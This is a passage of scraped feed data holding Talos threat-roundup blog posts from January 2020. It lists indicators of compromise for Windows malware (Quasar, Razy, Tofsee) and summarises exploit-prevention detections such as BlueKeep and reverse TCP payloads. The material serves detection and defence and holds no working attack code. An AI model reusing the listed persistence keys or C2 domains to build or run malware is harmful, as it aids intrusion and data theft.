\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Quasar Client Startup ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: java ` | 4 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Java ` | 4 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: error pending ` | 2 \n`<HKCR>\\LOCAL SETTINGS\\MUICACHE\\\\52C64B7E \nValue Name: LanguageList ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows startup ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: NET framework ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: steam ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\\\WINDOWS \nValue Name: Id ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\\\WINDOWS \nValue Name: Index ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: NvDisplay ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 1 \nMutexes | Occurrences \n---|--- \n`SwHHcMzPFPnmaghyKW` | 2 \n`ymJAxrWzIz9Lmt1RL3` | 2 \n`UuCyPSySUiFSDdHPtO` | 2 \n`sFWQsTLv8c5vk4jyO0` | 1 \n`tsgtBnaQMyDFZrUQIp` | 1 \n`YsyBq3MBwCzQNk2qhM` | 1 \n`q624fQPLA3sreuCLzt` | 1 \n`N3og1f8lHLVNu6W30c` | 1 \n`KckvHhqL1uihc4dCLw` | 1 \n`RTzXcJcD26j9cGndLe` | 1 \n`9uxtMjacj46ojfxw8Z` | 1 \n`tmiYIVMkI1dD9zfRjT` | 1 \n`hI0uR11aF8XGlij0wp` | 1 \n`fJO2dbxEGn2ZNnVHEj` | 1 \n`zqUBYqdAinRE5xYguS` | 1 \n`RtX4BZD2nWkVu0prSe` | 1 \n`HjjzZQZESOkAInyZch` | 1 \n`cP20H0tkmTiytEkIEL` | 1 \n`ixlUgkBMIocn8A96xU` | 1 \n`yIKLaGMppBM6EDhhvU` | 1 \n`mLvIMV7J1hOyksFGvj` | 1 \n`hj0AV9bM5BIleznxOc` | 1 \n`UQjK2wv6weKFSvAPxM` | 1 \n`UrlxbiSJX7lUOpSRZs` | 1 \n`JsMa39ctmfwcdenPhN` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]95[.]112[.]1` | 52 \n`37[.]8[.]73[.]90` | 2 \n`192[.]69[.]169[.]25` | 1 \n`103[.]43[.]75[.]105` | 1 \n`3[.]14[.]212[.]173` | 1 \n`3[.]19[.]114[.]185` | 1 \n`18[.]188[.]14[.]65` | 1 \n`103[.]136[.]43[.]131` | 1 \n`103[.]73[.]67[.]70` | 1 \n`74[.]118[.]139[.]67` | 1 \n`213[.]183[.]58[.]52` | 1 \n`141[.]255[.]158[.]23` | 1 \n`80[.]66[.]255[.]129` | 1 \n`95[.]59[.]113[.]113` | 1 \n`109[.]230[.]215[.]181` | 1 \n`185[.]248[.]100[.]84` | 1 \n`95[.]156[.]232[.]34` | 1 \n`88[.]150[.]227[.]112` | 1 \n`23[.]249[.]161[.]111` | 1 \n`36[.]84[.]57[.]230` | 1 \n`36[.]84[.]56[.]39` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip-api[.]com` | 52 \n`swez111[.]ddns[.]net` | 5 \n`scammer[.]chickenkiller[.]com` | 2 \n`holaholahola[.]hopto[.]org` | 2 \n`chrome[.]giize[.]com` | 2 \n`niroshimax[.]zapto[.]org` | 2 \n`0[.]tcp[.]ngrok[.]io` | 1 \n`gingles[.]ddns[.]net` | 1 \n`dhayan[.]ddns[.]net` | 1 \n`sanchosec[.]ddns[.]net` | 1 \n`apina123[.]duckdns[.]org` | 1 \n`mlks[.]ddns[.]net` | 1 \n`update1337[.]duckdns[.]org` | 1 \n`ord` | 1 \n`dike[.]duckdns[.]org` | 1 \n`nirovitch[.]zapto[.]org` | 1 \n`nume123[.]hopto[.]org` | 1 \n`pilnaspuodas[.]ddns[.]net` | 1 \n`danek56[.]ddns[.]net` | 1 \n`windows13467[.]ddns[.]net` | 1 \n`backtofuture[.]zapto[.]org` | 1 \n`nerdicon[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Logs` | 35 \n`%APPDATA%\\Logs\\01-17-2020` | 35 \n`%APPDATA%\\SubDir` | 28 \n`%System32%\\Tasks\\WINDOWSSYSTEMHOST` | 22 \n`%APPDATA%\\SubDir\\Client.exe` | 18 \n`%System32%\\Tasks\\Quasar Client Startup` | 8 \n`%APPDATA%\\<random, matching '[A-Z][a-z]{3,5}\\[a-z]{4,6}'>.exe` | 8 \n`E:\\autorun.inf` | 7 \n`\\autorun.inf` | 7 \n`%System32%\\Tasks\\java` | 4 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 4 \n`%APPDATA%\\SubDir\\WinUpdate.exe` | 2 \n`%SystemRoot%\\SysWOW64\\java64` | 2 \n`%SystemRoot%\\SysWOW64\\java64\\java.exe` | 2 \n`%System32%\\Tasks\\error pending ` | 2 \n`%APPDATA%\\SubDir\\fileintl.exe` | 2 \n`%System32%\\Tasks\\Windows Defender` | 1 \n`%System32%\\Tasks\\Windows` | 1 \n`%System32%\\Tasks\\Windows startup` | 1 \n`%System32%\\Tasks\\WinSql` | 1 \n`%APPDATA%\\SubDir\\WinSql1.exe` | 1 \n`%System32%\\Tasks\\NET framework` | 1 \n`%ProgramFiles(x86)%\\SubDir` | 1 \n`%ProgramFiles(x86)%\\SubDir\\Client.exe` | 1 \n`%System32%\\Tasks\\RDPBlox Agent` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 02c9df3dec221cacfa6c97e91bee174af3022dac4588e3f494108b0cc5c9fe1e 03fa8b9de359535afb3af2914e2bd91d630b85a0596604501968b12f9187b1da 0624f9670f56e83ab5bbdf903879ffd0facb5b27b4bc53d16f5d4a560033cdf8 0668b26c7ab4e7adbdf98d515b0a58ae06f5e89d67e5c9fa02a9ee7bea8a477a 09666ba370e36246342d7093b6c63b5a8ef10966fa78b79bcf570659a0dd2f77 0c598a620e83a6e0ee892aa5090e2dbbf36dde886620647be8c27bab0b94859e 0ed3feae6696b3986ae492d85fef56e2ec226d7b010154470b433bfc357f861b 189c7ebae4cdd338f844ba5adc3ecc322294a7be438a3a72eea69468ac068eb3 192a0440574068fd9297086e0cf05a57d8ae4af03045d6be4c0b4f21bd636a72 19b8ed7ab551d89467c665ee7f509fe3ece9101679b5302cdc70c6d3a8c12ee6 26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1 27473eaee1e66c3a9581d17b4ff94d481c31f23032b810493d99a23eebee6b22 29f55d706d0e7390d7e77aceae79909654b4868179ff6913f28d78df945a5a51 2b3eb6cf09691b169c603cbeba508c4056eb6c8d1f12abe11b3c11c77b130604 2d3cef89943a95c57418be1996431f9803c6df4a9307d1890a3885c8794986af 3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1 3204ad689f3939402dae9670970c55c684b559ce1a8ba5726eb3e143a0beea4a 3622a2b3adfc7cbc7727a7a13dc6c895290c6f6fc93c8e64e753e2041cafed16 362ec0bc0738f083dcdbf9472ebf4e6227b33d093c9dacf1093607fa3b53ea01 38c56bc6885e546caab8faa8f9b75a6b1d82a60f686038ccaf72f148187fb1ee 3baa2fb31a69683a134a24d5a5a05aa1619ce65ba9811e34d254a5efd708580c 42ee0201d3a74bf465daef9178042cc7fb28bab5b932e6d7a865cbc11fce6c94 472736830d9114c83bad680bc95c138d3951213d1429e314749b18083ac5cdf2 4d583b00c74ef261c7c20e53563b521ddda7b85bf5b1ac98463af0c6488a55d0 54b3c135aa1fe9b870209d36e286df1d7dc4e6182b664285f3564c573dbbdc89 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--j10gGhbFIw/XitQhRzhu3I/AAAAAAAADMA/mfL71YT3qRUdze9uqgfY3fDPm550V_MRQCLcBGAsYHQ/s1600/26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i2qf-xTBN_I/XitQmZo7OUI/AAAAAAAADME/K8p_3SstFo8SODkhxhMLtTz-l9PZUA7ZACLcBGAsYHQ/s1600/3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (8483) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (795) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nExcessively long PowerShell command detected \\- (576) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nProcess hollowing detected \\- (288) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (264) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (193) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (90) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (61) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nReverse tcp payload detected \\- (13) \nAn exploit payload intended to connect back to an attacker controlled host using tcp has been detected. \nWinExec payload detected \\- (13) \nAn exploit payload intended to execute commands on an attacker controlled host using WinExec has been detected. \n \n", "modified": "2020-01-24T12:58:50", "published": "2020-01-24T12:58:50", "id": "TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/1IoxheLePug/threat-roundup-0117-0124.html", "type": "talosblog", "title": "Threat Roundup for January 17 to January 24", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-10T23:26:13", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 3 and Jan. 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Razy-7505643-0 | Trojan | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Dropper.Tofsee-7492214-1 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet. \nWin.Packed.Ursnif-7489213-0 | Packed | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits. \nWin.Packed.ZeroAccess-7489468-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \nWin.Ransomware.TeslaCrypt-7501245-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily. \nWin.Dropper.Upatre-7491797-0 | Dropper | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware. \nWin.Dropper.TrickBot-7490964-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Packed.Formbook-7491272-1 | Packed | Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard. \n \n| | \n \n* * *\n\n## Threat Breakdown\n\n### Win.Trojan.Razy-7505643-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\SETTINGS\\LEAKDIAGNOSISATTEMPTED ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0748AF3992DE6E3AA7B386B7F6C08EF2.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\1C3DDA8020173A5B45A7C80CFC8B0298.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0748AF3992DE6E3AA7B386B7F6C08EF2.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\B4F3AEA9F95879ABBE9B311B5AB9FC30.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\2AA87EE2B7BAA7D413CC747537A867A2.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\1C3DDA8020173A5B45A7C80CFC8B0298.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\EB9064AF85850CF7B3485B2A911798D7.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\B4F3AEA9F95879ABBE9B311B5AB9FC30.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\2AA87EE2B7BAA7D413CC747537A867A2.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\EB9064AF85850CF7B3485B2A911798D7.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: goodsStartup key ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\6035E0F59A5169E7C59129A3CDBD076E.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\6035E0F59A5169E7C59129A3CDBD076E.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: goods ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0786B90DA12B29B5CC97621DCC78FA3E.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0786B90DA12B29B5CC97621DCC78FA3E.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: mrke ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\14c64321-2d62-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]12[.]206` | 10 \n`172[.]217[.]9[.]225` | 7 \n`172[.]217[.]5[.]238` | 6 \n`104[.]16[.]155[.]36` | 3 \n`77[.]88[.]21[.]158` | 3 \n`172[.]217[.]10[.]46` | 1 \n`172[.]217[.]10[.]33` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]yandex[.]com` | 3 \n`whatismyipaddress[.]com` | 3 \n`doc-00-6c-docs[.]googleusercontent[.]com` | 1 \n`doc-0s-9s-docs[.]googleusercontent[.]com` | 1 \n`doc-14-60-docs[.]googleusercontent[.]com` | 1 \n`doc-0k-c8-docs[.]googleusercontent[.]com` | 1 \n`doc-00-5o-docs[.]googleusercontent[.]com` | 1 \n`doc-10-6c-docs[.]googleusercontent[.]com` | 1 \n`doc-04-bg-docs[.]googleusercontent[.]com` | 1 \n`doc-04-6c-docs[.]googleusercontent[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\pid.txt` | 3 \n`%APPDATA%\\pidloc.txt` | 3 \n`%TEMP%\\holdermail.txt` | 3 \n`%TEMP%\\holderwb.txt` | 3 \n`%HOMEPATH%\\desktop\\product.pif` | 2 \n`%TEMP%\\bhv61AB.tmp` | 1 \n`%TEMP%\\bhv8DF6.tmp` | 1 \n`%HOMEPATH%\\Orkende` | 1 \n`%HOMEPATH%\\Orkende\\Recomm.pif` | 1 \n`%TEMP%\\bhv5953.tmp` | 1 \n \n#### File Hashes\n\n` 3031363a67eca33c68892ed7529803bbaa926a6f371204eeaa8ca205501d8cac 34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93 51e97032af43de44947d564ee43a9b43278312873caaa4bbd7d3e4f7ec00eb89 58962a9133651591f2d4df22589d1cdd4f7cee175f70c7d47c5a854a5264ec98 5be87b343f2d3af80883ed4deb795c0ae8f7e0ae4ba08a6bbac5b3e4659d0341 6bd1baae5ba600ff4ece4523e53bf9818bcc381a56664e3104c1c317d6f5a3bc 6dfdb201ddd46c8f2ded273f3c8ed6c5beca63196b5428fe388f59faaac79597 731aa2659852eb9b98d573b3f59436b49c15492d8df94e18da5a8f4c41f48fbe 79acdd5ea559b2e7e29fa6b47ca1053e11dbaadf540fc2b140aca89d1539d17e 8fa302841d886e0198c96d76d93399f5905844f424b255e6707a74ea610c55ce cdaef1b003e82f8994dd616103781125fca98ec097ee79830c2262f41158237a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-MHJh8tA_x9o/XhjbFSHPYiI/AAAAAAAADFU/6vgp_DT_TBw5sncscgE1kUlKvtjc_gI0ACLcBGAsYHQ/s1600/34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-YOqwN9OAMNc/XhjbJu1E0bI/AAAAAAAADFY/oGYUIcxuUSIoBIPFIKTTnZ_0Nz4zHEWAwCLcBGAsYHQ/s1600/34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7492214-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 192 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 175 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 68 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: Type ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: ErrorControl ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: DisplayName ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: WOW64 ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: ObjectName ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: Description ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: Type ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: ErrorControl ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: DisplayName ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: WOW64 ` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]55[.]5[.]250` | 192 \n`43[.]231[.]4[.]6/31` | 192 \n`85[.]114[.]134[.]88` | 192 \n`239[.]255[.]255[.]250` | 175 \n`46[.]4[.]52[.]109` | 175 \n`46[.]28[.]66[.]2` | 175 \n`78[.]31[.]67[.]23` | 175 \n`188[.]165[.]238[.]150` | 175 \n`93[.]179[.]69[.]109` | 175 \n`176[.]9[.]114[.]177` | 175 \n`192[.]0[.]47[.]59` | 174 \n`172[.]217[.]12[.]164` | 159 \n`74[.]125[.]192[.]26/31` | 140 \n`67[.]195[.]204[.]72/30` | 135 \n`168[.]95[.]5[.]116/31` | 134 \n`172[.]217[.]197[.]26/31` | 122 \n`172[.]217[.]10[.]67` | 116 \n`216[.]146[.]35[.]35` | 110 \n`212[.]227[.]15[.]40/31` | 104 \n`104[.]47[.]54[.]36` | 102 \n`208[.]76[.]51[.]51` | 101 \n`168[.]95[.]6[.]60/30` | 97 \n`98[.]136[.]96[.]92/31` | 95 \n`31[.]13[.]66[.]174` | 93 \n`98[.]136[.]96[.]74/31` | 91 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 192 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 192 \n`schema[.]org` | 175 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 175 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 175 \n`mta5[.]am0[.]yahoodns[.]net` | 175 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 175 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 175 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 175 \n`whois[.]iana[.]org` | 174 \n`whois[.]arin[.]net` | 173 \n`coolsex-finders6[.]com` | 173 \n`bestladies[.]cn` | 173 \n`bestdates[.]cn` | 173 \n`bestgirlsdates[.]cn` | 173 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 171 \n`eur[.]olc[.]protection[.]outlook[.]com` | 127 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 125 \n`ipinfo[.]io` | 118 \n`nam[.]olc[.]protection[.]outlook[.]com` | 93 \n`mx6[.]earthlink[.]net` | 91 \n`pkvw-mx[.]msg[.]pkvw[.]co[.]charter[.]net` | 88 \n`charter[.]net` | 87 \n`mx0[.]charter[.]net` | 87 \n`msn-com[.]olc[.]protection[.]outlook[.]com` | 72 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 192 